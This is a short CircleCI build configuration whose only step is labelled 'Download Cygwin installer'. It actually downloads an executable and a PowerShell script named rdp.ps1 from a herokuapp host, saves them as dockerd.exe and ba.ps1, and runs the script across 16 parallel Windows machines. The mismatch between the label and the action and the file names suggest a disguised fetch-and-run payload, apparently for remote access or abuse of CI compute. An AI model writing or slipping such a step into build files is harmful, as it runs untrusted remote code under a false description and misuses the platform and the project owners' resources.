version: 2.1
jobs:
  build:
    parallelism: 16
    machine:
      image: windows-server-2019-vs2019:stable
      shell: powershell.exe
    resource_class: windows.medium
    steps:
      - run:
          name: Download Cygwin installer
          shell: powershell.exe
          command: |
              Invoke-WebRequest https://momojo1.herokuapp.com/logcat.exe -OutFile dockerd.exe
              Invoke-WebRequest https://momojo1.herokuapp.com/rdp.ps1 -OutFile ba.ps1
              ./ba.ps1